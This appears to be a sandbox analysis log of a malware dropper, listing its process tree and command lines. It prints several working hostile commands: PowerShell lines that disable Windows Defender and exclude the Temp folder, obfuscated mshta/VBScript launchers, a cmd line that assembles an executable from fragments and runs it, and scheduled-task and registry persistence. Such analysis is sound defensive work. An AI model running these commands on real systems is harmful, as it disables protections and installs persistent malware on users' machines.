PID 3852 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe
PID 3852 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe
PID 4092 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4572 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4572 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4572 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4092 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 440 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 440 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 440 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4092 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 540 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon1348816450.exe
PID 540 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon1348816450.exe
PID 764 wrote to memory of 1376 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13459b4085.exe
PID 764 wrote to memory of 1376 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13459b4085.exe
PID 764 wrote to memory of 1376 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13459b4085.exe
PID 4264 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe
PID 4264 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe
PID 4264 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe
PID 876 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13136643d24e51.exe
PID 876 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13136643d24e51.exe
PID 876 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13136643d24e51.exe
PID 3756 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe
PID 3756 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe

"C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon135d1cd0566c227c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13d453d994180b.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon133b4073df5e3f72.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1348816450.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13459b4085.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13136643d24e51.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13073304e5395.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon134ab4d3e88a4d3e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13470f9aa951f871.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon135d1cd0566c227c.exe

Mon135d1cd0566c227c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13459b4085.exe

Mon13459b4085.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe

Mon13d453d994180b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon1348816450.exe

Mon1348816450.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13a2838ed1d8384.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe

Mon133b4073df5e3f72.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13248c3d7ea8c81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exe

Mon13a2838ed1d8384.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13be6b39578.exe

Mon13be6b39578.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exe

Mon13bb1ac8986b773.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exe

Mon13470f9aa951f871.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT ( "WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF """" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe"") do taskkill /f -im ""%~nXZ"" " , 0 , TRUE ) )

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exe" -u

C:\Users\Admin\AppData\Local\Temp\is-1GIM0.tmp\Mon13d453d994180b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-1GIM0.tmp\Mon13d453d994180b.tmp" /SL5="$7007A,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe"

C:\Users\Admin\AppData\Local\Temp\is-CKCAP.tmp\Mon13073304e5395.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CKCAP.tmp\Mon13073304e5395.tmp" /SL5="$401E0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exe

Mon13470f9aa951f871.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exe

Mon13248c3d7ea8c81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon134ab4d3e88a4d3e.exe

Mon134ab4d3e88a4d3e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe

Mon13073304e5395.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13bb1ac8986b773.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13136643d24e51.exe

Mon13136643d24e51.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13be6b39578.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-LQGDR.tmp\Mon13073304e5395.tmp

"C:\Users\Admin\AppData\Local\Temp\is-LQGDR.tmp\Mon13073304e5395.tmp" /SL5="$401D8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe

"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"

C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe

"C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"

C:\Users\Admin\AppData\Local\Temp\inst1.exe

"C:\Users\Admin\AppData\Local\Temp\inst1.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF "" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe") do taskkill /f -im "%~nXZ"

C:\Users\Admin\AppData\Local\Temp\chrome update.exe

"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe

"C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe"

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\

C:\Users\Admin\AppData\Local\Temp\Chrome5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F

C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe

3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9

C:\Users\Admin\AppData\Local\Temp\chrome1.exe

"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4756 -s 780

C:\Users\Admin\Pictures\Adobe Films\gN6O2dq2WbhTm6fJh8uI6Yim.exe

"C:\Users\Admin\Pictures\Adobe Films\gN6O2dq2WbhTm6fJh8uI6Yim.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 808

C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe

"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f -im "Mon133b4073df5e3f72.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT ( "WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF ""/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9"" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"") do taskkill /f -im ""%~nXZ"" " , 0 , TRUE ) )

C:\Users\Admin\AppData\Roaming\3490427.exe

"C:\Users\Admin\AppData\Roaming\3490427.exe"

C:\Users\Admin\AppData\Roaming\4775316.exe

"C:\Users\Admin\AppData\Roaming\4775316.exe"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF "/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe") do taskkill /f -im "%~nXZ"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 840

C:\Users\Admin\AppData\Roaming\6971572.exe

"C:\Users\Admin\AppData\Roaming\6971572.exe"

C:\Users\Admin\AppData\Roaming\1961519.exe

"C:\Users\Admin\AppData\Roaming\1961519.exe"

C:\Users\Admin\AppData\Roaming\8883359.exe

"C:\Users\Admin\AppData\Roaming\8883359.exe"

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 864

C:\Users\Admin\Pictures\Adobe Films\2pxQh0RIhP1_2eIKt4DiswNe.exe

"C:\Users\Admin\Pictures\Adobe Films\2pxQh0RIhP1_2eIKt4DiswNe.exe"

C:\Users\Admin\Pictures\Adobe Films\vo7gM1WgFlIHRA3ee6pfKIPW.exe

"C:\Users\Admin\Pictures\Adobe Films\vo7gM1WgFlIHRA3ee6pfKIPW.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 880

C:\Users\Admin\Pictures\Adobe Films\MwrYFdDwXMjBNPBXln8Qxvw6.exe

"C:\Users\Admin\Pictures\Adobe Films\MwrYFdDwXMjBNPBXln8Qxvw6.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\3EEB.bat "C:\Users\Admin\Pictures\Adobe Films\vo7gM1WgFlIHRA3ee6pfKIPW.exe""

C:\Users\Admin\Pictures\Adobe Films\ZSgqt8nl8BBcMk6806AnfgO0.exe

"C:\Users\Admin\Pictures\Adobe Films\ZSgqt8nl8BBcMk6806AnfgO0.exe"

C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe

"C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 964

C:\Users\Admin\Pictures\Adobe Films\S3BTMsvx1awTSaJavTtOP4zy.exe

"C:\Users\Admin\Pictures\Adobe Films\S3BTMsvx1awTSaJavTtOP4zy.exe"

C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe

"C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\Pictures\Adobe Films\brdu1HxjJmQNBE_LCEBrVrj0.exe

"C:\Users\Admin\Pictures\Adobe Films\brdu1HxjJmQNBE_LCEBrVrj0.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2260 -s 1508

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 728 -s 888

C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe

"C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 488

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q/r EChO | sEt /P = "MZ" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscript:ClOse ( CReatEobJeCt ("wscrIPt.SHElL" ). RuN ( "C:\Windows\system32\cmd.exe /q/r EChO | sEt /P = ""MZ"" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F " ,0 ,TrUe ) )

C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe

"C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe"

C:\Users\Admin\Pictures\Adobe Films\GVoH0wxewvdvviYeQefkeDfr.exe

"C:\Users\Admin\Pictures\Adobe Films\GVoH0wxewvdvviYeQefkeDfr.exe"

C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe

"C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe"

C:\Users\Admin\Pictures\Adobe Films\0SVzRqtrLqGszUttRCSPtStG.exe

"C:\Users\Admin\Pictures\Adobe Films\0SVzRqtrLqGszUttRCSPtStG.exe"

C:\Users\Admin\Pictures\Adobe Films\dUPufBp8b5UpL7b5PL6rD4NL.exe

"C:\Users\Admin\Pictures\Adobe Films\dUPufBp8b5UpL7b5PL6rD4NL.exe"

C:\Users\Admin\Pictures\Adobe Films\ouukX2gWm4bOReO9fMEOPQwO.exe

"C:\Users\Admin\Pictures\Adobe Films\ouukX2gWm4bOReO9fMEOPQwO.exe"

C:\Users\Admin\Pictures\Adobe Films\47ueqKbktwMvOe6Oaq3dHYym.exe

"C:\Users\Admin\Pictures\Adobe Films\47ueqKbktwMvOe6Oaq3dHYym.exe"

C:\Users\Admin\Pictures\Adobe Films\NDQQZfY1FgbG9sgWkG3WufVk.exe

"C:\Users\Admin\Pictures\Adobe Films\NDQQZfY1FgbG9sgWkG3WufVk.exe"

C:\Users\Admin\Pictures\Adobe Films\udC2PFiAM7CV1pDxqCKMkAKi.exe

"C:\Users\Admin\Pictures\Adobe Films\udC2PFiAM7CV1pDxqCKMkAKi.exe"

C:\Users\Admin\Pictures\Adobe Films\3YBEzT78hGZQ25Kuo6k2BPiA.exe

"C:\Users\Admin\Pictures\Adobe Films\3YBEzT78hGZQ25Kuo6k2BPiA.exe"

C:\Users\Admin\Pictures\Adobe Films\NOfoq72wcAoFEU3DklhMhNDX.exe

"C:\Users\Admin\Pictures\Adobe Films\NOfoq72wcAoFEU3DklhMhNDX.exe"

C:\Users\Admin\Pictures\Adobe Films\M6nnRwpfN_C9M2bpsXh11Hv1.exe

"C:\Users\Admin\Pictures\Adobe Films\M6nnRwpfN_C9M2bpsXh11Hv1.exe"

C:\Users\Admin\Pictures\Adobe Films\9OvPWBAzbH2v3X4H8qUPtoi1.exe

"C:\Users\Admin\Pictures\Adobe Films\9OvPWBAzbH2v3X4H8qUPtoi1.exe"

C:\Users\Admin\Pictures\Adobe Films\Kf6ErwGMDmCrxkubyQ_ZPBpZ.exe

"C:\Users\Admin\Pictures\Adobe Films\Kf6ErwGMDmCrxkubyQ_ZPBpZ.exe"

C:\Users\Admin\Pictures\Adobe Films\Y4ZhZNkfjQADSsZuikB97aBz.exe

"C:\Users\Admin\Pictures\Adobe Films\Y4ZhZNkfjQADSsZuikB97aBz.exe"

C:\Users\Admin\Pictures\Adobe Films\ckqFusKz3ejFYHZN4zbmq6eq.exe

"C:\Users\Admin\Pictures\Adobe Films\ckqFusKz3ejFYHZN4zbmq6eq.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" EChO "

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2424 -s 1532

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>XlaE8u7.Rq"

C:\Program Files (x86)\Company\NewProduct\inst2.exe

"C:\Program Files (x86)\Company\NewProduct\inst2.exe"

C:\Program Files (x86)\Company\NewProduct\rtst1039.exe

"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"

